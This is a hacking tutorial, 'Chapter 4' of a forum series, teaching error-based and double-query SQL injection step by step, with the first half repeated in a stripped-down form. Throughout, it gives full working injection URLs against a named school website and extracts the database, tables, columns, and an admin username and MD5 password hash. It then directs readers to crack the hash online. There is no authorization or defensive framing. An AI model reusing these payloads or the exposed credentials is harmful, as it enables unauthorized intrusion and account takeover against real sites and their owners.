Tutorial by Zer0Freak
Zer0Freak SQLi Tutorials
Difficulty: Intermediate Level 2 and Advanced
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)
Previous Chapters:
Chapter1: How to use/create dorks
Chapter2:Basic SQL injection using login queries
Chapter3: Detailed Union/Normal Based SQL injection
Alright I'll make this tutorial as short as possible so that you can understand faster.
Understanding Error Based/Double Query
How does Error Base and Double Query work
Error Based:
Double Query:
I'll explain further in this tutorial
Anyways, focus on this part of this tutorial
Error Based IS Double Query
Error Based = Double Query (Error based 2x)
How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking; the type of injection to use in different situations.
You can use Error Based/ Double Query Injections in the following errors you get
Now take note of those errors. You'll be needing it
Lets start with Error Based SQL injection
Alright for this lesson, we'll use this site as an example:
http://www.aliqbalschools.org
First approach is knowing the version of the database
To do that we enter this query after the end of the URL
So the site will look like this
Results:
Now that we know the version of the database which is 5, lets move to the next step
Second step: Getting the database name
To get the database, we enter this query
Notice the limit function in the query
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1
Now our website address will look like this
Results:
Database is : iqbal_iqbal
Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later
Third Step: Getting the TABLE NAMES
Table names is what we need now
Here's the query we can use:
Don't also forget the LIMIT function we used here to get table names one by one
Alright our web address will look like this:
Now here's the important part:
When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from
Here's the formula: LIMIT N,1 where N is a random integer
Valuable Tables can be:
In this case, we have the table "settings"
So now we know our table, lets move on to the next step
Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:
Notice the LIMIT 0,1 FUNCTION and 0xTABLEHEX
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query
Results:
Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Column name= passWord
Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password
Fifth Step: Extracting the data from Columns
Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query
Now before you proceed, watch and focus on the code and study what happens.
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
3. TABLENAME: where you insert the table name of the column names you extracted from
4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS
After you're done with altering the code to your needs of extracting information, time to execute it
Here's what the code will look like:
Results:
SUCCESS, you injected the site with error based now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash
Difficulty: Intermediate Level 2 and Advanced
Requirements: Patience,intuition and understanding
Estimated time to read the chapter: 10-20 min (reading thoroughly will help you understand better)
Previous Chapters:
Chapter1: How to use/create dorks
Chapter2:Basic SQL injection using login queries
Chapter3: Detailed Union/Normal Based SQL injection
Alright I'll make this tutorial as short as possible so that you can understand faster.
Understanding Error Based/Double Query
How does Error Base and Double Query work
Error Based:
Code:
A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information
Code:
Basically like Error Based, except that the Error Based Query will be doubled as a single query statement so that we'll get errors with information in it
Anyways, focus on this part of this tutorial
Error Based IS Double Query
Error Based = Double Query (Error based 2x)
How do you know you should use Error Based/Double Query? (Important!)
This is the most important part of web hacking; the type of injection to use in different situations.
You can use Error Based/ Double Query Injections in the following errors you get
Code:
a. The Used Select Statements Have Different Number Of Columns.
b. Unknown Column 1 or no columns at all (in webpage and page source)
c.Error #1604
Lets start with Error Based SQL injection
Alright for this lesson, we'll use this site as an example:
http://www.aliqbalschools.org
First approach is knowing the version of the database
To do that we enter this query after the end of the URL
Code:
or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
So the site will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--
Results:
Now that we know the version of the database which is 5, lets move to the next step
Second step: Getting the database name
To get the database, we enter this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
A website can have more than 2 two databases, so increase the limit until you find all database names
Example: limit 0,1 or limit 1,1 or limit 2,1
Now our website address will look like this
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Database is : iqbal_iqbal
Second step is done where we extract the database names we need.
MAKE sure you write the database name on a paper or notepad
We'll need it later
Third Step: Getting the TABLE NAMES
Table names is what we need now
Here's the query we can use:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Alright our web address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Now here's the important part:
When you search for tables keep incrementing the limit until you find the valuable table name
For example: LIMIT 0,1
LIMIT 1,1
LIMIT 2,1
Keep increasing the number until you find the table you want to extract the information from
Here's the formula: LIMIT N,1 where N is a random integer
Valuable Tables can be:
Code:
Users
Admin
user
administrator
tbladmin
tblusers
settings
So now we know our table, lets move on to the next step
Fourth Step: Getting Columns from specific TABLE NAMES
Alright, now that you've chosen the table you wanna extract columns from, time to execute another query
So here's how a column query extraction will look like:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
You need to convert your specific table into hex and add 0x at the beginning of the string so that it can be readable to the website
To convert a string to hex use: http://www.swingnote.com/tools/texttohex.php
Here's how the address will look like along with the query
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Results:
Code:
Duplicate entry 'Id~1' for key 'group_key
Now you need to increment the limit until you find valuable columns such as userName and passWord.
So in this case,
Column name = userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Column name= passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Again, don't forget to see the LIMIT Function
Now that we found the columns we want to extract information from i.e "userName" and "passWord", lets proceed to the next step where we can actually get the login username and password
Fifth Step: Extracting the data from Columns
Alright this part is probably the best in SQL injecting site.
Time to get the info from the columns we have
To do that, use this query
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Here we have 4 variables:
1. COLUMN_NAME: where you insert the column name you want to extract information from
2.Databasename: where you insert the current database name of the website so that you'll be extract info from it
3. TABLENAME: where you insert the table name of the column names you extracted from
4. LIMIT N,1: LIMIT Function and N where N is a random integer
Now lets do some replacing, FOCUS
Code:
COLUMN_NAME replace with "userName" and "passWord"
Databasename replace with "iqbal_iqbal"
TABLENAME replace with "settings"
Here's what the code will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Code:
Duplicate entry 'admin~86f574c1d63d53fa804c13c3213953d9~1' for key
SUCCESS, you injected the site with error based now you have the login info
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Go to http://www.md5decrypter.co.uk/ to crack that MD5 Hash
Now Lets Start with DOUBLE Query SQL Injection
So basically, as stated above, DOUBLE Query is the same like Error Based except the query we'll enter is gonna be double the normal error based query
First off, the definition so that you can understand:
Code:
Double query SQL injection is a vulnerability that uses two queries together wrapped into one that confuses the db to a point where it spits out an error. This error gives us the info we need to leverage the database all the way to the admin panel. As a matter of fact we can pretty much dump the whole database if we want.
Differences:
Error Based Query for Database Extraction:
Code:
and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Double Query for Database Extraction:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Now you get the idea, lets cut to the chase and go on
We'll be using the same site as above
Step1: Getting the database version
Alright same as Error Based, here's the Double query:
Code:
and(select 1 from(select count(*),concat((select (select
concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
So our Address will look like this:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
NOTE(IMPORTANT): Make sure that your queries are very well organized when you execute them, otherwise the browser will return the results as an error.
Results after query execution:
Code:
Duplicate entry '~'5.1.56-log'~1' for key 'group_key
You can test on the site now if you want so that you won't get confused
Step2: Getting the Database
Now we've got the version, lets execute a double query on extracting the database
Query for Database extraction:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
It shows that
Limit N,1 where N is a random integer. Example: Limit 0,1
Here's what our address will then look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
So here's the results:
Code:
iqbal_iqbal
Note it down on a notepad or a paper
Step3: Getting the Table Names
As I've explained above, we'll be also using the LIMIT Function in this query.
Just a quick look, the query will look like this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where
table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1
Alright you need to focus on the code and see the changes.
There are two variables here:
1. Hex_code_databasename
2. LIMIT Function
Obviously, we need to Hex the database name we've just taken into record and add 0x in the beginning i.e. Database= 0xiqbal_iqbal
To convert your database name into hex: http://www.swingnote.com/tools/texttohex.php
Now that you've the database into hex, lets see what our address will look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0x697162616c5f697162616c LIMIT 19,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
LIMIT 19,1 brings us the valuable table which is "settings"
Review the code and study it
Step4: Getting Column names from specific Tables and Database
Now that we know what we need which are the table (settings) and database (iqbal_iqbal), lets proceed to the next step; column extraction
Here's what the query will look like:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct
concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name LIMIT N,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
1. Hex code of Databasename: Hex the database which in our case is (iqbal_iqbal)
2. Hex code of tablename: Hex the table name which is "settings"
3. LIMIT Function
Alright, I'm pretty sure you know what you have to do exactly so I don't need to explain everything again and again.
Here's what the address is gonna look like:
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Keep incrementing the LIMIT until you find the valuable columns which in our case is "userName" and "passWord"
Review what we have just done for less confusion
Step5: Getting the Data from the Columns with the help of Table name and Database name
Alright now that we know what we need to extract, lets get our goods
As far as what we're injected in the site, this is our information:
database name: iqbal_iqbal
table name: settings
column names: userName, passWord
Here's what the query will look like first (for extracting data):
Code:
and(select 1 from(select count(*),concat((select (select
(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Variables:
table_name.column_name: Input the table name and column name you want to extract information from
database_name.table_name: Input the database name and table name you want to extract information from
LIMIT Function: Increment until you find the data you need
So here's what our address is gonna look like when we extract details from userName
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Code:
admim
Query for extracting details from passWord
Code:
http://www.aliqbalschools.org/index.php?mode=getpagecontent&pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
Code:
86f574c1d63d53fa804c13c3213953d9
Username: admin
Password: 86f574c1d63d53fa804c13c3213953d9
Alright I think that's pretty much what you have to know about Error Based/Double Query SQL injection.
Just so that everything can be as cleared as possible, watch and learn from the video I made for you guys below:
Thank you guys for reading my tutorial and watching my video
Hope it helped you guys understand the concept of Error Based/Double Query SQL injection
End of Chapter 4
Upcoming Chapter: Detailed String Based SQL injection
Contact Me: zerofreak@live.com
Stay tuned on Zer0 MegaProjectSQLi for more tutorials
Have a great day